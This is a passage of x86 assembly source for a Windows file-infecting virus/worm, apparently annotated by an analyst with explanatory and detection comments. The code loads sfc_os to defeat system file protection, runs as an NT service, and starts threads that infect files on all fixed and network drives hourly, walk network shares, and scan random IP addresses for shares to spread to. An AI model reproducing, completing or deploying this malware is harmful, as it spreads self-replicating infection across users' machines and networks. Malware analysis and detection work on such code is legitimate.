        dd      (krncrc_count + 1) dup (0)
krncrcend       label   near
        dd      offset swap_create - offset krncrcend + 4

;-----------------------------------------------------------------------------
;swap CreateFileW and CreateFileMappingA because of alphabet order
;-----------------------------------------------------------------------------

swap_create     label   near
        ;Self-modifying: the current esp (base of the kernel32 pointer table
        ;that init_findmz left on the stack, indexed as krncrcstk) is written
        ;into the code at store_krnapi. The +3 looks like the immediate operand
        ;of an instruction there and the 401000h-based address implies a fixed
        ;image base - store_krnapi is outside this excerpt, confirm there.
        mov     dword ptr ds:[offset store_krnapi - offset junkmail_inf + expsize + 401003h], esp
        mov     ebx, esp
        ;The CRC table is in alphabetical order, so the resolved slots for
        ;CreateFileMappingA and CreateFileW come out the wrong way round;
        ;exchange the two pointers in place.
        mov     eax, dword ptr [ebx + krncrcstk.kCreateFileMappingA]
        xchg    dword ptr [ebx + krncrcstk.kCreateFileW], eax
        mov     dword ptr [ebx + krncrcstk.kCreateFileMappingA], eax

;-----------------------------------------------------------------------------
;get SFC support if available
;-----------------------------------------------------------------------------

        ;The call pushes the address of the inline "sfc_os" string as its
        ;return address; load_sfc uses that as the LoadLibraryA argument.
        call    load_sfc
        db      "sfc_os", 0                     ;Windows XP (forwarder chain from sfc.dll)

load_sfc        label   near
        call    cLoadLibraryA
        test    eax, eax
        jne     found_sfc
        push    'cfs'                           ;Windows Me/2000 - "sfc",0 built on the stack
        push    esp
        call    cLoadLibraryA
        pop     ecx
        test    eax, eax
        je      sfcapi_esp                      ;neither library loaded: eax = 0 is stored below

found_sfc       label   near
        ;init_findmz (outside this excerpt) appears to resolve the APIs named
        ;by the CRC table that follows its call (reached via the return
        ;address) and to push the results on the stack; the dd after each
        ;table looks like the displacement at which execution resumes.
        ;NOTE(review): the tables are assembled as zeros here, so the real
        ;CRC values must be written in elsewhere - not visible in this excerpt.
        call    init_findmz

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

sfccrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (sfccrc_count + 1) dup (0)
sfccrcend       label   near
        dd      offset sfcapi_pop - offset sfccrcend + 4

sfcapi_pop      label   near
        pop     eax                             ;first (presumably only) resolved sfc pointer

sfcapi_esp      label   near
        ;Patches the immediate operand at store_sfcapi+1 (same scheme as
        ;store_netapi in find_wnet); value is 0 when no sfc library loaded.
        mov     dword ptr ds:[offset store_sfcapi - offset junkmail_inf + expsize + 401001h], eax

;-----------------------------------------------------------------------------
;get rest of APIs required for network thread
;-----------------------------------------------------------------------------

        push    'rpm'                           ;"mpr",0 built on the stack
        push    esp
        call    cLoadLibraryA
        pop     ecx
        call    init_findmz                     ;resolve the mpr APIs listed below

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

netcrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (netcrc_count + 1) dup (0)
netcrcend       label   near
        dd      offset netapi_esp - offset netcrcend + 4

netapi_esp      label   near
        ;Take the WNetCloseEnum pointer from the stack table (relative to the
        ;WNetOpenEnumW slot) and patch it into the mov eax immediate at
        ;store_netapi. edi is assumed to hold the runtime address of
        ;netapi_esp here - TODO confirm against init_findmz.
        mov     eax, dword ptr [esp + netcrcstk.nWNetCloseEnum - netcrcstk.nWNetOpenEnumW]
        mov     dword ptr [edi + offset store_netapi - offset netapi_esp + 1], eax

;-----------------------------------------------------------------------------
;initialise service table if NT/2000/XP
;-----------------------------------------------------------------------------

        call    cGetVersion
        shr     eax, 1fh                        ;eax = high bit: set on 9x/Me, clear on NT
        jne     svc_main                        ;no service if 9x/Me
        ;eax = 0 from here on. The two zero dwords pushed next appear to act
        ;as the NULL terminator of the SERVICE_TABLE_ENTRY array built at
        ;start_disp - confirm once the svccrc table size is known.
        push    eax
        push    eax
        mov     eax, offset regdll - offset junkmail_inf + expsize + 401000h  ;absolute address of the regdll string (contents outside this excerpt)
        push    eax
        call    cLoadLibraryA
        call    init_findmz                     ;resolve the service API(s) listed below

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

svccrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (svccrc_count + 1) dup (0)
svccrcend       label   near
        dd      offset start_disp - offset svccrcend + 4

start_disp      label   near
        pop     eax                             ;resolved dispatcher pointer (presumably StartServiceCtrlDispatcher, given the SERVICE_TABLE_ENTRY below)
        mov     ecx, esp                        ;service name pointer: points at the zeroed slots, i.e. an empty string
        add     edi, offset svc_main - offset start_disp  ;edi = runtime address of svc_main (service main callback)
        push    edi                             ;SERVICE_TABLE_ENTRY.lpServiceProc
        push    ecx                             ;SERVICE_TABLE_ENTRY.lpServiceName
        push    esp                             ;pointer to the table
        call    eax                             ;does not return if service launch
        add     esp, size SERVICE_TABLE_ENTRY   ;fix stack if app launch

svc_main        label   near
        ;Reached by fall-through (app launch) or as the service main.
        ;Begins the CreateThread argument list for thread 1: thread-id slot,
        ;lpThreadId, dwCreationFlags = 0, lpParameter = 0; the return address
        ;pushed by `call create_thr1` (the find_drives proc that follows the
        ;call) becomes lpStartAddress.
        push    eax
        push    esp
        xor     esi, esi
        push    esi
        push    esi
        call    create_thr1

;-----------------------------------------------------------------------------
;thread 1: infect files on all fixed and remote drive letters
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; find_drives - thread 1 body (entered as the return address of the
; `call create_thr1` above). Walks the drive letters A: .. Z:; for every
; drive whose GetDriveTypeA result is DRIVE_FIXED or DRIVE_REMOTE it makes
; the drive root the current directory and calls find_files (outside this
; excerpt). After Z: it sleeps one hour and starts over; never returns.
; Regs:  eax = "X:\",0 as a dword (al = drive letter); ecx scratch
; Uses:  store_krnapi (outside this excerpt) with eax = table index
; Detection note: one SetCurrentDirectoryA per drive root, repeated
; hourly, is the behavioural fingerprint of this loop.
;-----------------------------------------------------------------------------

find_drives     proc    near
        mov     eax, '\:A'                      ;NEC-PC98 uses A: for boot drive which can be hard disk

drive_loop      label   near
        push    eax                             ;"X:\",0 on the stack
        push    esp                             ;pointer to it = GetDriveTypeA argument
        push    (krncrcstk.kGetDriveTypeA - krncrcstk.klstrlenW) shr 2
        pop     eax                             ;eax = dword index of GetDriveTypeA in the kernel32 table
        call    store_krnapi
        sub     al, DRIVE_FIXED
        je      drive_set                       ;fixed drive
        xchg    ecx, eax                        ;ecx = type - DRIVE_FIXED
        loop    drive_next                      ;loop if not DRIVE_REMOTE (loop decrements first, so only ecx == 1, i.e. DRIVE_REMOTE, falls through)

drive_set       label   near
        push    esp                             ;pointer to the "X:\" still on the stack
        call    cSetCurrentDirectoryA
        call    find_files

drive_next      label   near
        pop     eax                             ;restore the "X:\" dword
        inc     eax                             ;next drive letter in al
        cmp     al, 'Z' + 1
        jne     drive_loop
        push    60 * 60 * 1000                  ;1 hour
        call    cSleep
        jmp     find_drives                     ;start again at A:
find_drives     endp

;create_thr1 - entered via `call` from svc_main; the return address (the
;find_drives proc above) is already on the stack as lpStartAddress, below
;it lpParameter = 0, dwCreationFlags = 0 and lpThreadId. Only dwStackSize
;and lpThreadAttributes (both 0 via esi) are added before CreateThread.
create_thr1     label   near
        push    esi
        push    esi
        call    cCreateThread
        ;Same scheme for thread 2: lpThreadId, flags = 0, param = 0, then the
        ;return address of `call create_thr2` (the get_krnapis call below)
        ;becomes thread 2's start address.
        push    esp
        push    esi
        push    esi
        call    create_thr2

;-----------------------------------------------------------------------------
;thread 2: find files on network shares using non-recursive algorithm
;-----------------------------------------------------------------------------

        call    get_krnapis                     ;thread 2 entry point; get_krnapis is outside this excerpt (presumably sets up the ebp base that find_wnet uses - confirm)

;-----------------------------------------------------------------------------
; find_wnet - thread 2 body. Enumerates the network neighbourhood with
; WNetOpenEnumW / WNetEnumResourceW / WNetCloseEnum without recursion:
; every container that is descended into gets a wnetlist node (GlobalAlloc)
; recording the parent node and parent enum handle, so the walk can climb
; back up at wnet_close. Each non-container resource is made the current
; directory (SetCurrentDirectoryW on lpRemoteName) and handed to find_files
; (outside this excerpt). After the whole tree it sleeps two hours and
; starts over; never returns.
; Regs:  ebx = current enum handle, esi = current wnetlist node,
;        edi = current NETRESOURCE buffer (0 for the root open)
; Assumes ebp addresses the resolved API tables (set outside this proc).
; Detection note: each resource is fetched with a 1-byte probe call
; (expecting ERROR_MORE_DATA) followed by a correctly sized second call.
;-----------------------------------------------------------------------------

find_wnet       proc    near
        xor     ebx, ebx                        ;previous handle
        xor     esi, esi                        ;previous node
        xor     edi, edi                        ;previous buffer

wnet_open       label   near
        push    eax                             ;slot that receives the enum handle
        push    esp                             ;lphEnum
        push    edi                             ;lpNetResource: 0 at the root, else the container just read
        push    0                               ;dwUsage
        push    RESOURCETYPE_DISK
        push    RESOURCE_GLOBALNET
        call    dword ptr [ebp + netcrcstk.nWNetOpenEnumW - size netcrcstk]
        push    eax                             ;keep the open result
        push    edi
        call    cGlobalFree                     ;container buffer is no longer needed
        pop     ecx                             ;ecx = open result
        pop     edi                             ;edi = new enum handle
        inc     ecx
        loop    wnet_next                       ;only NO_ERROR (ecx -> 0) falls through; on error keep walking the current handle ebx
        push    size wnetlist
        push    ecx                             ;GMEM_FIXED
        call    cGlobalAlloc
        mov     dword ptr [eax + wnetlist.wnetprev], esi  ;new node remembers parent node ...
        mov     dword ptr [eax + wnetlist.wnethand], ebx  ;... and parent handle
        xchg    esi, eax                        ;esi = new node
        mov     ebx, edi                        ;descend: new handle becomes current

wnet_next       label   near
        push    1                               ;slot used as lpcCount (= 1) and, on return, the required size (lpBufferSize)
        mov     eax, esp
        push    eax                             ;lpBufferSize = &1: deliberate 1-byte probe
        push    esp                             ;lpBuffer (a stack slot; only 1 byte advertised)
        push    eax                             ;lpcCount
        push    ebx                             ;hEnum
        call    dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
        pop     edi                             ;edi = required buffer size
        sub     al, ERROR_MORE_DATA             ;anything but "buffer too small" (e.g. ERROR_NO_MORE_ITEMS) ends this level
        jne     wnet_close
        push    edi
        push    eax                             ;GMEM_FIXED
        call    cGlobalAlloc
        xchg    ecx, eax
        jecxz   wnet_close                      ;allocation failed: close this level
        push    edi                             ;size slot
        mov     eax, esp
        push    1                               ;count slot
        mov     edx, esp
        push    eax                             ;lpBufferSize
        push    ecx                             ;lpBuffer
        push    edx                             ;lpcCount
        push    ebx                             ;hEnum
        mov     edi, ecx                        ;edi = NETRESOURCE buffer
        call    dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
        pop     ecx                             ;drop the count and size slots
        pop     ecx
        test    eax, eax
        jne     wnet_free                       ;error: free the buffer, then close this level
        test    byte ptr [edi + NETRESOURCE.dwUsage], RESOURCEUSAGE_CONTAINER
        jne     wnet_open                       ;container: descend into it
        push    dword ptr [edi + NETRESOURCE.lpRemoteName]
        call    dword ptr [ebp + krncrcstk.kSetCurrentDirectoryW]
        xchg    ecx, eax
        jecxz   wnet_skipdir                    ;share not usable as a directory

        ;I'm alone here
        ;with emptiness eagles and snow.
        ;Unfriendliness chilling my body
        ;and taunting with pictures of home.
        ;(Deep Purple)

        call    find_files

wnet_skipdir    label   near
        xor     eax, eax                        ;eax = 0: continue this level after freeing the buffer

wnet_free       label   near
        push    eax                             ;0 (continue) or the WNetEnumResourceW error (close level)
        push    edi
        call    cGlobalFree
        pop     ecx
        jecxz   wnet_next

wnet_close      label   near
        push    ebx                             ;hEnum for WNetCloseEnum

store_netapi    label   near
        mov     eax, '!bgr'                     ;placeholder immediate, patched with the WNetCloseEnum address at netapi_esp
        call    eax                             ;WNetCloseEnum
        mov     ecx, dword ptr [esi + wnetlist.wnetprev]
        jecxz   wnet_exit                       ;no parent node: the whole tree has been walked
        mov     ebx, dword ptr [esi + wnetlist.wnethand]  ;climb: restore the parent handle ...
        push    esi
        mov     esi, ecx                        ;... and parent node, then free the finished node
        call    cGlobalFree
        jmp     wnet_next                       ;resume the parent enumeration

wnet_exit       label   near
        push    120 * 60 * 1000                 ;2 hours
        call    cSleep
        jmp     find_wnet                       ;start over from the root
find_wnet       endp

;create_thr2 - entered via `call` from create_thr1; the return address (the
;get_krnapis call leading into find_wnet) is thread 2's lpStartAddress.
;Adds dwStackSize and lpThreadAttributes (0) and creates the thread.
create_thr2     label   near
        push    esi
        push    esi
        call    cCreateThread
        push    esp                             ;thread 3: lpThreadId, flags = 0, param = 0 ...
        push    esi
        push    esi
        call    create_thr3                     ;... start = return address below; create_thr3 itself is outside this excerpt

;-----------------------------------------------------------------------------
;thread 3: find files on random IP address shares using non-recursive algorithm
;(alter class A: 25%, class b: 25%, class c: 25%, class d: scan all)
;-----------------------------------------------------------------------------

        call    cGetVersion                     ;thread 3 entry point
        test    eax, eax                        ;SF = high bit of GetVersion (set on 9x/Me); the movs below keep the flags
        mov     eax, 'aten'
        mov     ecx, '23ip'                     ;"netapi32" (NT/2000/XP)
        jns     ip_loaddll
        mov     eax, 'arvs'
        movzx   ecx, cx                         ;"svrapi" (9x/Me)

ip_loaddll      label   near
        pushfd                                  ;keep SF across LoadLibraryA for the jns below
        push    0                               ;terminator + two name dwords = ASCIIZ library name on the stack
        push    ecx
        push    eax
        push    esp
        call    cLoadLibraryA
        add     esp, 0ch                        ;discard the three name dwords
        popfd
        jns     ip_getprocnt                    ;NT family: use the netapi32 table
        call    init_findmz                     ;9x/Me: resolve the svrapi APIs listed below

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

ip9xcrcbegin    label   near                    ;place < 80h bytes from call for smaller code
        dd      (ip9xcrc_count + 1) dup (0)
ip9xcrcend      label   near
        dd      offset ip_share - offset ip9xcrcend + 4

ip_getprocnt    label   near
        call    init_findmz                     ;NT: resolve the netapi32 APIs listed below; both paths continue at ip_share

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

ipntcrcbegin    label   near                    ;place < 80h bytes from call for smaller code
        dd      (ipntcrc_count + 1) dup (0)
ipntcrcend      label   near
        dd      offset ip_share - offset ipntcrcend + 4

ip_share        label   near
